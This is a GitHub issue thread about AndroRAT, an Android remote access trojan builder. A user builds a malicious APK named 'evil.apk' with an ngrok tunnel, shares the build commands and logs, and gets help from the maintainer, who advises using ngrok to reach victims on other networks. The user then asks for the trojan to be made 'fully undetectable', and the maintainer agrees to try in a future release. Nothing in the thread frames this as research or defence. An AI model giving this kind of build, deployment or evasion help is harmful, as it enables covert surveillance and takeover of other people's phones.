### ISSUE TITLE
WindowsApps Permission Denied, can't build

### ISSUE THREAD

**Issue by baobao21** [karma9874/AndroRAT#55]
I installed python from Microsoft App Store.
I'm getting this error below when I execute it !
FYI, I ran Git BASH as Administrator but still same error occured. How to fix? Please help 

 python androRAT.py --build --ngrok -o evil.apk
bash: /c/Users/Kas/AppData/Local/Microsoft/WindowsApps/python: Permission denied

**Comment by baobao21** [comment]
Please help anyone urgently...

**Comment by baobao21** [comment]
[INFO] Generating APK
[INFO] Building APK |
W: C:\Users\Kaz\AndroRAT\Compiled_apk_files\res\values-v26\styles.xml:14: error: Error: No resource found that matches the given name: attr 'android:keyboardNavigationCluster'.
W:
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\Kaz\AppData\Local\Temp\brut_util_Jar_5522465134983109836.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 22, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, C:\Users\Kaz\AppData\Local\Temp\APKTOOL4237873043372648811.tmp, -e, C:\Users\Kaz\AppData\Local\Temp\APKTOOL1023330082389241207.tmp, -0, arsc, -I, C:\Users\Kaz\AppData\Local\apktool\framework\1.apk, -S, C:\Users\Kaz\AndroRAT\Compiled_apk_files\res, -M, C:\Users\Kaz\AndroRAT\Compiled_apk_files\AndroidManifest.xml]

[ERROR] Building Failed

**Comment by baobao21** [comment]
I tried both manually and automatically with NGROK, saved ngrok configuration first, authenticated it, but still same error with both commands of building apk....failed !

Please help??

**Comment by karma9874** [comment]
Hey, I tried to fix the issue, can you re-clone the repo and try again to check if it's a fix or not.

**Comment by baobao21** [comment]
Thank you. It's working, built and signed apk manually. 
But it's waiting for connections after running shell command.
Do I need to forward the port or do something else??? 
How to forward?

**Comment by baobao21** [comment]
Thank you. It's working, built and signed apk manually. 
But it's waiting for connections after running shell command.
Do I need to forward the port or do something else??? 
How to forward?

**Comment by karma9874** [comment]
If it's not on the same network then I would suggest using --ngrok build for it to work

**Comment by baobao21** [comment]
Sorry It didn't work. It creates the tunnel_IP, then it keeps waiting....
$ python androRAT.py --build --ngrok -o LALA.apk
[INFO] Tunnel_IP: xxxxxxx PORT: xxxxx    (- EDIT(ip-port removed))
[INFO] Generating APK
[INFO] Building APK |
[SUCCESS] Successfully apk built in C:\Users\kas\androrat\LALA.apk
[INFO] Signing the apk
[INFO] Signing Apk |
[SUCCESS] Successfully signed the apk LALA.apk


[INFO] Waiting for Connections  \

**Comment by baobao21** [comment]
Okay this time IT WORKED !!!!

**Comment by baobao21** [comment]
But mate, python -m SimpleHTTPServer - What does this command do? What is it for? I noticed the apk is not more fully undetectable. Can you make it FUD again??

**Comment by baobao21** [comment]
Well, it is working now with --ngrok. I see it is detectable on Android 9 as Trojan. Can you make it fully undetectable again?
And, how do I reconnect if I want to reconnect later??

And how do I exit the shell command and return back to Interpreter?

**Comment by baobao21** [comment]
It doesnt work. It's unstable and is detectable even by default android security system without even antivirus.

Can you please update it making it FUD again and make it stable??

**Comment by karma9874** [comment]
Will try to implement it in future release.
